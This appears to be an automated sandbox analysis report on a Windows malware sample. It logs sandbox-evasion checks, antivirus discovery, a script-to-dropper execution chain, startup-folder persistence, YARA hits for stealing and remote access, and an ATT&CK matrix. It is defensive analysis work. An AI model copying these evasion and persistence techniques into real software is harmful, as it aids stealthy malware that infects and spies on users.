                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 598235
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 598110
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 597985
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 597860
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 597750
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 597641
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 597516
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 597407
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 597282
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 597172
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 597063
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 596938
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 596813
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 596703
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 596594
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 596485
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 596360Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 596235Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 596110Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 595974Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 595856Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 595734Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 595610Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 595485Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 595364Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 595235Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 595110Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594985Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594875Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594766Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594641Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594530Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594421Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594313Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594188Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594063Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 593953Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Window / User API: threadDelayed 2647
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Window / User API: threadDelayed 7113
                                    Source: C:\ProviderWebSavesNet\hostcrt.exe TID: 3068 Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 3872 Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832 Thread sleep time: -30437127721620741s >= -30000s
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 6488 Thread sleep time: -10800000s >= -30000s
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe TID: 5104 Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                    Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
                                    Source: C:\ProviderWebSavesNet\hostcrt.exe File Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe File Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exe Code function: 0_2_00CCA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00CCA69B
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exe Code function: 0_2_00CDC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00CDC220
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exe Code function: 0_2_00CDE6A3 VirtualQuery,GetSystemInfo,0_2_00CDE6A3
                                    Source: C:\ProviderWebSavesNet\hostcrt.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 30000
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594875Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594766Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594641Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594530Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594421Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594313Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594188Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594063Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 593953Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeFile opened: C:\Users\user\AppData\
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeFile opened: C:\Users\user\
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                                    Source: wscript.exe, 00000001.00000003.1749162240.00000000030CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                    Source: OpenWith.exe, 0000000C.00000002.1944710952.0000020976A50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}5
                                    Source: kIdT4m0aa4.exe, 00000000.00000003.1684661064.0000000002FF3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}V
                                    Source: COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4216699421.000000001BB10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeAPI call chain: ExitProcess graph end nodegraph_0-25101
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeCode function: 11_2_00007FFD9BC832D0 rdtsc 11_2_00007FFD9BC832D0
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CDF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CDF838
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CE7DEE mov eax, dword ptr fs:[00000030h]0_2_00CE7DEE
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CEC030 GetProcessHeap,0_2_00CEC030
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CDF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CDF838
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CDF9D5 SetUnhandledExceptionFilter,0_2_00CDF9D5
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CDFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00CDFBCA
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CE8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CE8EBD
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeMemory allocated: page read and write | page guardJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProviderWebSavesNet\KzpapvVcbVWl7x3kYPCfes0ojKXptfYw4GAjwTs.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProviderWebSavesNet\4m3MAufDe8UYuW2ydRhKZQEREfiJBHvyHq5AIcSjywzlT6BxOyJV1br81hHR.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProviderWebSavesNet\hostcrt.exe "C:\ProviderWebSavesNet/hostcrt.exe"Jump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sBxboqxXs.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe "C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe" Jump to behavior
                                    Source: COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.0000000003071000.00000004.00000800.00020000.00000000.sdmp, COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.00000000030E8000.00000004.00000800.00020000.00000000.sdmp, COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.00000000031FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                                    Source: COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.00000000031FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{},"5.0.4",5,1,"","user","571345","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files\\Microsoft","UMNW3 (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.33","US / United States of America","New York / New York City"," / "]
                                    Source: COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.00000000031FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.33","US / United State
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CDF654 cpuid 0_2_00CDF654
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00CDAF0F
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeQueries volume information: C:\ProviderWebSavesNet\hostcrt.exe VolumeInformationJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeQueries volume information: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe VolumeInformationJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                                    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                                    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe VolumeInformation
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CDDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00CDDF1E
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CCB146 GetVersionExW,0_2_00CCB146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                    Source: COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4216699421.000000001BB10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                    Stealing of Sensitive Information

                                    Source: Yara matchFile source: 0000000B.00000002.4164385410.0000000003213000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000B.00000002.4164385410.0000000003385000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000002.1798966545.00000000130E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: hostcrt.exe PID: 6488, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: COBPewMCbcSeQUSyEIOt.exe PID: 764, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: services.exe PID: 4588, type: MEMORYSTR
                                    Source: Yara matchFile source: kIdT4m0aa4.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.kIdT4m0aa4.exe.67da6f2.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.hostcrt.exe.610000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.kIdT4m0aa4.exe.70dd6f2.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.kIdT4m0aa4.exe.67da6f2.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1682046441.000000000708F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000000.1749800429.0000000000612000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1681650291.000000000678C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\ProviderWebSavesNet\hostcrt.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Media\Characters\conhost.exe, type: DROPPED
                                    Source: Yara matchFile source: kIdT4m0aa4.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.kIdT4m0aa4.exe.67da6f2.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.hostcrt.exe.610000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.kIdT4m0aa4.exe.70dd6f2.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.kIdT4m0aa4.exe.67da6f2.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\ProviderWebSavesNet\hostcrt.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Media\Characters\conhost.exe, type: DROPPED

                                    Remote Access Functionality

                                    Source: Yara matchFile source: 0000000B.00000002.4164385410.0000000003213000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000B.00000002.4164385410.0000000003385000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000002.1798966545.00000000130E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: hostcrt.exe PID: 6488, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: COBPewMCbcSeQUSyEIOt.exe PID: 764, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: services.exe PID: 4588, type: MEMORYSTR
                                    Source: Yara matchFile source: kIdT4m0aa4.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.kIdT4m0aa4.exe.67da6f2.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.hostcrt.exe.610000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.kIdT4m0aa4.exe.70dd6f2.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.kIdT4m0aa4.exe.67da6f2.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1682046441.000000000708F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000000.1749800429.0000000000612000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1681650291.000000000678C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\ProviderWebSavesNet\hostcrt.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Media\Characters\conhost.exe, type: DROPPED
                                    Source: Yara matchFile source: kIdT4m0aa4.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.kIdT4m0aa4.exe.67da6f2.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.hostcrt.exe.610000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.kIdT4m0aa4.exe.70dd6f2.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.kIdT4m0aa4.exe.67da6f2.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\ProviderWebSavesNet\hostcrt.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Media\Characters\conhost.exe, type: DROPPED
                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting
                                    Valid Accounts141
                                    Windows Management Instrumentation
                                    11
                                    Scripting
                                    12
                                    Process Injection
                                    133
                                    Masquerading
                                    OS Credential Dumping1
                                    System Time Discovery
                                    Remote Services1
                                    Archive Collected Data
                                    1
                                    Encrypted Channel
                                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts2
                                    Command and Scripting Interpreter
                                    11
                                    Registry Run Keys / Startup Folder
                                    11
                                    Registry Run Keys / Startup Folder
                                    1
                                    Disable or Modify Tools
                                    LSASS Memory271
                                    Security Software Discovery
                                    Remote Desktop ProtocolData from Removable Media2
                                    Non-Application Layer Protocol
                                    Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain AccountsAt1
                                    DLL Side-Loading
                                    1
                                    DLL Side-Loading
                                    261
                                    Virtualization/Sandbox Evasion
                                    Security Account Manager2
                                    Process Discovery
                                    SMB/Windows Admin SharesData from Network Shared Drive12
                                    Application Layer Protocol
                                    Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                                    Process Injection
                                    NTDS261
                                    Virtualization/Sandbox Evasion
                                    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    Deobfuscate/Decode Files or Information
                                    LSA Secrets1
                                    Application Window Discovery
                                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                                    Obfuscated Files or Information
                                    Cached Domain Credentials1
                                    Remote System Discovery
                                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                    Software Packing
                                    DCSync1
                                    System Network Configuration Discovery
                                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                    DLL Side-Loading
                                    Proc Filesystem3
                                    File and Directory Discovery
                                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow157
                                    System Information Discovery
                                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                    [Behavior Graph: ID: 1507297, Sample: kIdT4m0aa4.exe, Startdate: 08/09/2024, Architecture: WINDOWS, Score: 100]

                                    Source | Detection | Scanner | Label | Link
                                    kIdT4m0aa4.exe | 100% | Avira | VBS/Runner.VPG |
                                    kIdT4m0aa4.exe | 100% | Joe Sandbox ML | |

                                    Source | Detection | Scanner | Label | Link
                                    C:\Users\user\Desktop\TLuxYJBs.log | 100% | Avira | HEUR/AGEN.1300079 |
                                    C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe | 100% | Avira | HEUR/AGEN.1323342 |
                                    C:\Users\user\AppData\Local\Temp\4sBxboqxXs.bat | 100% | Avira | BAT/Delbat.C |
                                    C:\ProviderWebSavesNet\KzpapvVcbVWl7x3kYPCfes0ojKXptfYw4GAjwTs.vbe | 100% | Avira | VBS/Runner.VPG |
                                    C:\Users\user\Desktop\GcNqxydU.log | 100% | Avira | HEUR/AGEN.1300079 |
                                    C:\ProviderWebSavesNet\hostcrt.exe | 100% | Avira | HEUR/AGEN.1323342 |
                                    C:\Users\user\Desktop\BpvsVBNg.log | 100% | Avira | TR/PSW.Agent.qngqt |
                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe | 100% | Avira | HEUR/AGEN.1323342 |
                                    C:\Users\user\Desktop\FxsAqTHc.log | 100% | Avira | HEUR/AGEN.1300079 |
